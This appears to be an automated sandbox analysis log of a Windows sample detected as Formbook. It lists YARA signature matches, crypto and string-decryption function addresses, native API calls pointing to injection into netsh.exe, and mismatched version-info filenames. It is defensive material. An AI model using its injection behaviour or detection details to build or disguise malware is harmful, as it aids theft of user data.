Source: 2.0.cK1g5gckZR9VHjj.exe.400000.6.raw.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000002.00000000.354564190.0000000000400000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000002.00000000.354564190.0000000000400000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000002.00000000.355165380.0000000000400000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000002.00000000.355165380.0000000000400000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 0000000C.00000002.612178801.00000000033D0000.00000004.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0000000C.00000002.612178801.00000000033D0000.00000004.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000002.00000002.433824497.0000000000400000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000002.00000002.433824497.0000000000400000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000005.00000000.407619289.000000000E6B1000.00000040.00020000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000005.00000000.407619289.000000000E6B1000.00000040.00020000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 0000000C.00000002.611462047.0000000003090000.00000040.00020000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0000000C.00000002.611462047.0000000003090000.00000040.00020000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000002.00000002.434217315.0000000000F80000.00000040.00020000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000002.00000002.434217315.0000000000F80000.00000040.00020000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000005.00000000.392202181.000000000E6B1000.00000040.00020000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000005.00000000.392202181.000000000E6B1000.00000040.00020000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000002.00000002.434604641.00000000012F0000.00000040.00020000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000002.00000002.434604641.00000000012F0000.00000040.00020000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 0000000C.00000002.611332367.0000000002DC0000.00000040.00020000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0000000C.00000002.611332367.0000000002DC0000.00000040.00020000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000000.00000002.358483058.0000000003DF6000.00000004.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000000.00000002.358483058.0000000003DF6000.00000004.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Detected potential crypto function
Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe Code function: 0_2_008E5C24 0_2_008E5C24
Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe Code function: 0_2_02B98250 0_2_02B98250
Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe Code function: 0_2_02B9D2F8 0_2_02B9D2F8
Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe Code function: 1_2_002F5C24 1_2_002F5C24
Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe Code function: 2_2_00401030 2_2_00401030
Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe Code function: 2_2_0041BC78 2_2_0041BC78
Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe Code function: 2_2_00408C7B 2_2_00408C7B
Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe Code function: 2_2_00408C80 2_2_00408C80
Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe Code function: 2_2_0041BD01 2_2_0041BD01
Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe Code function: 2_2_00402D90 2_2_00402D90
Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe Code function: 2_2_0041BEE0 2_2_0041BEE0
Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe Code function: 2_2_00402FB0 2_2_00402FB0
Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe Code function: 2_2_0041CFB6 2_2_0041CFB6
Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe Code function: 2_2_00565C24 2_2_00565C24
Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe Code function: 2_2_01004120 2_2_01004120
Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe Code function: 2_2_00FFB090 2_2_00FFB090
Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe Code function: 2_2_010A1002 2_2_010A1002
Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe Code function: 2_2_010120A0 2_2_010120A0
Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe Code function: 2_2_010B20A8 2_2_010B20A8
Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe Code function: 2_2_010B28EC 2_2_010B28EC
Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe Code function: 2_2_00FEF900 2_2_00FEF900
Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe Code function: 2_2_010B2B28 2_2_010B2B28
Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe Code function: 2_2_0101EBB0 2_2_0101EBB0
Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe Code function: 2_2_010ADBD2 2_2_010ADBD2
Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe Code function: 2_2_010B22AE 2_2_010B22AE
Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe Code function: 2_2_010B2D07 2_2_010B2D07
Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe Code function: 2_2_010B1D55 2_2_010B1D55
Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe Code function: 2_2_01012581 2_2_01012581
Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe Code function: 2_2_010B25DD 2_2_010B25DD
Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe Code function: 2_2_00FF841F 2_2_00FF841F
Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe Code function: 2_2_00FFD5E0 2_2_00FFD5E0
Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe Code function: 2_2_010AD466 2_2_010AD466
Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe Code function: 2_2_00FE0D20 2_2_00FE0D20
Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe Code function: 2_2_010B1FF1 2_2_010B1FF1
Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe Code function: 2_2_010AD616 2_2_010AD616
Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe Code function: 2_2_01006E30 2_2_01006E30
Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe Code function: 2_2_010B2EF7 2_2_010B2EF7
Source: C:\Windows\SysWOW64\netsh.exe Code function: 12_2_0388DBD2 12_2_0388DBD2
Source: C:\Windows\SysWOW64\netsh.exe Code function: 12_2_03892B28 12_2_03892B28
Source: C:\Windows\SysWOW64\netsh.exe Code function: 12_2_037FEBB0 12_2_037FEBB0
Source: C:\Windows\SysWOW64\netsh.exe Code function: 12_2_038922AE 12_2_038922AE
Source: C:\Windows\SysWOW64\netsh.exe Code function: 12_2_037E4120 12_2_037E4120
Source: C:\Windows\SysWOW64\netsh.exe Code function: 12_2_037CF900 12_2_037CF900
Source: C:\Windows\SysWOW64\netsh.exe Code function: 12_2_038920A8 12_2_038920A8
Source: C:\Windows\SysWOW64\netsh.exe Code function: 12_2_038928EC 12_2_038928EC
Source: C:\Windows\SysWOW64\netsh.exe Code function: 12_2_03881002 12_2_03881002
Source: C:\Windows\SysWOW64\netsh.exe Code function: 12_2_0389E824 12_2_0389E824
Source: C:\Windows\SysWOW64\netsh.exe Code function: 12_2_037F20A0 12_2_037F20A0
Source: C:\Windows\SysWOW64\netsh.exe Code function: 12_2_037DB090 12_2_037DB090
Source: C:\Windows\SysWOW64\netsh.exe Code function: 12_2_03891FF1 12_2_03891FF1
Source: C:\Windows\SysWOW64\netsh.exe Code function: 12_2_037E6E30 12_2_037E6E30
Source: C:\Windows\SysWOW64\netsh.exe Code function: 12_2_03892EF7 12_2_03892EF7
Source: C:\Windows\SysWOW64\netsh.exe Code function: 12_2_0388D616 12_2_0388D616
Source: C:\Windows\SysWOW64\netsh.exe Code function: 12_2_038925DD 12_2_038925DD
Source: C:\Windows\SysWOW64\netsh.exe Code function: 12_2_037C0D20 12_2_037C0D20
Source: C:\Windows\SysWOW64\netsh.exe Code function: 12_2_03892D07 12_2_03892D07
Source: C:\Windows\SysWOW64\netsh.exe Code function: 12_2_037DD5E0 12_2_037DD5E0
Source: C:\Windows\SysWOW64\netsh.exe Code function: 12_2_03891D55 12_2_03891D55
Source: C:\Windows\SysWOW64\netsh.exe Code function: 12_2_037F2581 12_2_037F2581
Source: C:\Windows\SysWOW64\netsh.exe Code function: 12_2_037D841F 12_2_037D841F
Source: C:\Windows\SysWOW64\netsh.exe Code function: 12_2_0388D466 12_2_0388D466
Source: C:\Windows\SysWOW64\netsh.exe Code function: 12_2_02DDBEE0 12_2_02DDBEE0
Source: C:\Windows\SysWOW64\netsh.exe Code function: 12_2_02DDCFB6 12_2_02DDCFB6
Source: C:\Windows\SysWOW64\netsh.exe Code function: 12_2_02DC2FB0 12_2_02DC2FB0
Source: C:\Windows\SysWOW64\netsh.exe Code function: 12_2_02DC8C80 12_2_02DC8C80
Source: C:\Windows\SysWOW64\netsh.exe Code function: 12_2_02DDBC78 12_2_02DDBC78
Source: C:\Windows\SysWOW64\netsh.exe Code function: 12_2_02DC8C7B 12_2_02DC8C7B
Source: C:\Windows\SysWOW64\netsh.exe Code function: 12_2_02DC2D90 12_2_02DC2D90
Source: C:\Windows\SysWOW64\netsh.exe Code function: 12_2_02DDBD01 12_2_02DDBD01
Found potential string decryption / allocating functions
Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe Code function: String function: 00FEB150 appears 35 times
Source: C:\Windows\SysWOW64\netsh.exe Code function: String function: 037CB150 appears 35 times
Contains functionality to call native functions
Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe Code function: 2_2_004185E0 NtCreateFile, 2_2_004185E0
Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe Code function: 2_2_00418690 NtReadFile, 2_2_00418690
Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe Code function: 2_2_00418710 NtClose, 2_2_00418710
Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe Code function: 2_2_004187C0 NtAllocateVirtualMemory, 2_2_004187C0
Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe Code function: 2_2_004185DA NtCreateFile, 2_2_004185DA
Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe Code function: 2_2_0041870C NtReadFile,NtClose, 2_2_0041870C
Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe Code function: 2_2_004187BA NtAllocateVirtualMemory, 2_2_004187BA
Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe Code function: 2_2_01029910 NtAdjustPrivilegesToken,LdrInitializeThunk, 2_2_01029910
Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe Code function: 2_2_010299A0 NtCreateSection,LdrInitializeThunk, 2_2_010299A0
Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe Code function: 2_2_01029840 NtDelayExecution,LdrInitializeThunk, 2_2_01029840
Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe Code function: 2_2_01029860 NtQuerySystemInformation,LdrInitializeThunk, 2_2_01029860
Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe Code function: 2_2_010298F0 NtReadVirtualMemory,LdrInitializeThunk, 2_2_010298F0
Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe Code function: 2_2_01029A00 NtProtectVirtualMemory,LdrInitializeThunk, 2_2_01029A00
Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe Code function: 2_2_01029A20 NtResumeThread,LdrInitializeThunk, 2_2_01029A20
Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe Code function: 2_2_01029A50 NtCreateFile,LdrInitializeThunk, 2_2_01029A50
Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe Code function: 2_2_01029540 NtReadFile,LdrInitializeThunk, 2_2_01029540
Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe Code function: 2_2_010295D0 NtClose,LdrInitializeThunk, 2_2_010295D0
Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe Code function: 2_2_01029710 NtQueryInformationToken,LdrInitializeThunk, 2_2_01029710
Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe Code function: 2_2_01029780 NtMapViewOfSection,LdrInitializeThunk, 2_2_01029780
Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe Code function: 2_2_010297A0 NtUnmapViewOfSection,LdrInitializeThunk, 2_2_010297A0
Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe Code function: 2_2_01029FE0 NtCreateMutant,LdrInitializeThunk, 2_2_01029FE0
Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe Code function: 2_2_01029660 NtAllocateVirtualMemory,LdrInitializeThunk, 2_2_01029660
Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe Code function: 2_2_010296E0 NtFreeVirtualMemory,LdrInitializeThunk, 2_2_010296E0
Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe Code function: 2_2_01029950 NtQueueApcThread, 2_2_01029950
Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe Code function: 2_2_010299D0 NtCreateProcessEx, 2_2_010299D0
Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe Code function: 2_2_01029820 NtEnumerateKey, 2_2_01029820
Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe Code function: 2_2_0102B040 NtSuspendThread, 2_2_0102B040
Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe Code function: 2_2_010298A0 NtWriteVirtualMemory, 2_2_010298A0
Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe Code function: 2_2_01029B00 NtSetValueKey, 2_2_01029B00
Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe Code function: 2_2_0102A3B0 NtGetContextThread, 2_2_0102A3B0
Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe Code function: 2_2_01029A10 NtQuerySection, 2_2_01029A10
Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe Code function: 2_2_01029A80 NtOpenDirectoryObject, 2_2_01029A80
Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe Code function: 2_2_01029520 NtWaitForSingleObject, 2_2_01029520
Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe Code function: 2_2_0102AD30 NtSetContextThread, 2_2_0102AD30
Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe Code function: 2_2_01029560 NtWriteFile, 2_2_01029560
Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe Code function: 2_2_010295F0 NtQueryInformationFile, 2_2_010295F0
Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe Code function: 2_2_0102A710 NtOpenProcessToken, 2_2_0102A710
Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe Code function: 2_2_01029730 NtQueryVirtualMemory, 2_2_01029730
Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe Code function: 2_2_01029760 NtOpenProcess, 2_2_01029760
Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe Code function: 2_2_0102A770 NtOpenThread, 2_2_0102A770
Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe Code function: 2_2_01029770 NtSetInformationFile, 2_2_01029770
Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe Code function: 2_2_01029610 NtEnumerateValueKey, 2_2_01029610
Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe Code function: 2_2_01029650 NtQueryValueKey, 2_2_01029650
Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe Code function: 2_2_01029670 NtQueryInformationProcess, 2_2_01029670
Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe Code function: 2_2_010296D0 NtCreateKey, 2_2_010296D0
Source: C:\Windows\SysWOW64\netsh.exe Code function: 12_2_03809A50 NtCreateFile,LdrInitializeThunk, 12_2_03809A50
Source: C:\Windows\SysWOW64\netsh.exe Code function: 12_2_038099A0 NtCreateSection,LdrInitializeThunk, 12_2_038099A0
Source: C:\Windows\SysWOW64\netsh.exe Code function: 12_2_03809910 NtAdjustPrivilegesToken,LdrInitializeThunk, 12_2_03809910
Source: C:\Windows\SysWOW64\netsh.exe Code function: 12_2_03809840 NtDelayExecution,LdrInitializeThunk, 12_2_03809840
Source: C:\Windows\SysWOW64\netsh.exe Code function: 12_2_03809860 NtQuerySystemInformation,LdrInitializeThunk, 12_2_03809860
Source: C:\Windows\SysWOW64\netsh.exe Code function: 12_2_03809780 NtMapViewOfSection,LdrInitializeThunk, 12_2_03809780
Source: C:\Windows\SysWOW64\netsh.exe Code function: 12_2_03809FE0 NtCreateMutant,LdrInitializeThunk, 12_2_03809FE0
Source: C:\Windows\SysWOW64\netsh.exe Code function: 12_2_03809710 NtQueryInformationToken,LdrInitializeThunk, 12_2_03809710
Source: C:\Windows\SysWOW64\netsh.exe Code function: 12_2_038096D0 NtCreateKey,LdrInitializeThunk, 12_2_038096D0
Source: C:\Windows\SysWOW64\netsh.exe Code function: 12_2_038096E0 NtFreeVirtualMemory,LdrInitializeThunk, 12_2_038096E0
Source: C:\Windows\SysWOW64\netsh.exe Code function: 12_2_038095D0 NtClose,LdrInitializeThunk, 12_2_038095D0
Source: C:\Windows\SysWOW64\netsh.exe Code function: 12_2_03809540 NtReadFile,LdrInitializeThunk, 12_2_03809540
Source: C:\Windows\SysWOW64\netsh.exe Code function: 12_2_0380A3B0 NtGetContextThread, 12_2_0380A3B0
Source: C:\Windows\SysWOW64\netsh.exe Code function: 12_2_03809B00 NtSetValueKey, 12_2_03809B00
Source: C:\Windows\SysWOW64\netsh.exe Code function: 12_2_03809A80 NtOpenDirectoryObject, 12_2_03809A80
Source: C:\Windows\SysWOW64\netsh.exe Code function: 12_2_03809A00 NtProtectVirtualMemory, 12_2_03809A00
Source: C:\Windows\SysWOW64\netsh.exe Code function: 12_2_03809A10 NtQuerySection, 12_2_03809A10
Source: C:\Windows\SysWOW64\netsh.exe Code function: 12_2_03809A20 NtResumeThread, 12_2_03809A20
Source: C:\Windows\SysWOW64\netsh.exe Code function: 12_2_038099D0 NtCreateProcessEx, 12_2_038099D0
Source: C:\Windows\SysWOW64\netsh.exe Code function: 12_2_03809950 NtQueueApcThread, 12_2_03809950
Source: C:\Windows\SysWOW64\netsh.exe Code function: 12_2_038098A0 NtWriteVirtualMemory, 12_2_038098A0
Source: C:\Windows\SysWOW64\netsh.exe Code function: 12_2_038098F0 NtReadVirtualMemory, 12_2_038098F0
Source: C:\Windows\SysWOW64\netsh.exe Code function: 12_2_03809820 NtEnumerateKey, 12_2_03809820
Source: C:\Windows\SysWOW64\netsh.exe Code function: 12_2_0380B040 NtSuspendThread, 12_2_0380B040
Source: C:\Windows\SysWOW64\netsh.exe Code function: 12_2_038097A0 NtUnmapViewOfSection, 12_2_038097A0
Source: C:\Windows\SysWOW64\netsh.exe Code function: 12_2_0380A710 NtOpenProcessToken, 12_2_0380A710
Source: C:\Windows\SysWOW64\netsh.exe Code function: 12_2_03809730 NtQueryVirtualMemory, 12_2_03809730
Source: C:\Windows\SysWOW64\netsh.exe Code function: 12_2_03809760 NtOpenProcess, 12_2_03809760
Source: C:\Windows\SysWOW64\netsh.exe Code function: 12_2_0380A770 NtOpenThread, 12_2_0380A770
Source: C:\Windows\SysWOW64\netsh.exe Code function: 12_2_03809770 NtSetInformationFile, 12_2_03809770
Source: C:\Windows\SysWOW64\netsh.exe Code function: 12_2_03809610 NtEnumerateValueKey, 12_2_03809610
Source: C:\Windows\SysWOW64\netsh.exe Code function: 12_2_03809650 NtQueryValueKey, 12_2_03809650
Source: C:\Windows\SysWOW64\netsh.exe Code function: 12_2_03809660 NtAllocateVirtualMemory, 12_2_03809660
Source: C:\Windows\SysWOW64\netsh.exe Code function: 12_2_03809670 NtQueryInformationProcess, 12_2_03809670
Source: C:\Windows\SysWOW64\netsh.exe Code function: 12_2_038095F0 NtQueryInformationFile, 12_2_038095F0
Source: C:\Windows\SysWOW64\netsh.exe Code function: 12_2_03809520 NtWaitForSingleObject, 12_2_03809520
Source: C:\Windows\SysWOW64\netsh.exe Code function: 12_2_0380AD30 NtSetContextThread, 12_2_0380AD30
Source: C:\Windows\SysWOW64\netsh.exe Code function: 12_2_03809560 NtWriteFile, 12_2_03809560
Source: C:\Windows\SysWOW64\netsh.exe Code function: 12_2_02DD8690 NtReadFile, 12_2_02DD8690
Source: C:\Windows\SysWOW64\netsh.exe Code function: 12_2_02DD8710 NtClose, 12_2_02DD8710
Source: C:\Windows\SysWOW64\netsh.exe Code function: 12_2_02DD85E0 NtCreateFile, 12_2_02DD85E0
Source: C:\Windows\SysWOW64\netsh.exe Code function: 12_2_02DD870C NtReadFile,NtClose, 12_2_02DD870C
Source: C:\Windows\SysWOW64\netsh.exe Code function: 12_2_02DD85DA NtCreateFile, 12_2_02DD85DA
Sample file is different than original file name gathered from version info
Source: cK1g5gckZR9VHjj.exe, 00000000.00000002.358021001.0000000003BDD000.00000004.00000001.sdmp Binary or memory string: OriginalFilenameUI.dll@ vs cK1g5gckZR9VHjj.exe
Source: cK1g5gckZR9VHjj.exe, 00000000.00000000.342497076.0000000000950000.00000002.00020000.sdmp Binary or memory string: OriginalFilenameIVectorVi.exe. vs cK1g5gckZR9VHjj.exe
Source: cK1g5gckZR9VHjj.exe, 00000000.00000002.357245488.0000000002BD1000.00000004.00000001.sdmp Binary or memory string: OriginalFilenameInnerException.dll" vs cK1g5gckZR9VHjj.exe
Source: cK1g5gckZR9VHjj.exe, 00000000.00000002.359712250.0000000005B10000.00000004.00020000.sdmp Binary or memory string: OriginalFilenameInnerException.dll" vs cK1g5gckZR9VHjj.exe
Source: cK1g5gckZR9VHjj.exe, 00000000.00000002.357490796.0000000002C9A000.00000004.00000001.sdmp Binary or memory string: OriginalFilenameInnerException.dll" vs cK1g5gckZR9VHjj.exe
Source: cK1g5gckZR9VHjj.exe, 00000000.00000002.360053021.00000000060A0000.00000004.00020000.sdmp Binary or memory string: OriginalFilenameUI.dll@ vs cK1g5gckZR9VHjj.exe
Source: cK1g5gckZR9VHjj.exe, 00000001.00000000.351201212.0000000000360000.00000002.00020000.sdmp Binary or memory string: OriginalFilenameIVectorVi.exe. vs cK1g5gckZR9VHjj.exe
Source: cK1g5gckZR9VHjj.exe, 00000002.00000000.354123685.00000000005D0000.00000002.00020000.sdmp Binary or memory string: OriginalFilenameIVectorVi.exe. vs cK1g5gckZR9VHjj.exe
Source: cK1g5gckZR9VHjj.exe, 00000002.00000002.434367747.00000000010DF000.00000040.00000001.sdmp Binary or memory string: OriginalFilenamentdll.dllj% vs cK1g5gckZR9VHjj.exe
Source: cK1g5gckZR9VHjj.exe, 00000002.00000002.434893300.0000000002FCC000.00000040.00020000.sdmp Binary or memory string: OriginalFilenamenetsh.exej% vs cK1g5gckZR9VHjj.exe
Source: cK1g5gckZR9VHjj.exe, 00000002.00000002.434541337.000000000126F000.00000040.00000001.sdmp Binary or memory string: OriginalFilenamentdll.dllj% vs cK1g5gckZR9VHjj.exe
Source: cK1g5gckZR9VHjj.exe Binary or memory string: OriginalFilenameIVectorVi.exe. vs cK1g5gckZR9VHjj.exe
Source: cK1g5gckZR9VHjj.exe Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe File read: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe:Zone.Identifier Jump to behavior
Source: cK1g5gckZR9VHjj.exe Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: unknown Process created: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe "C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe"
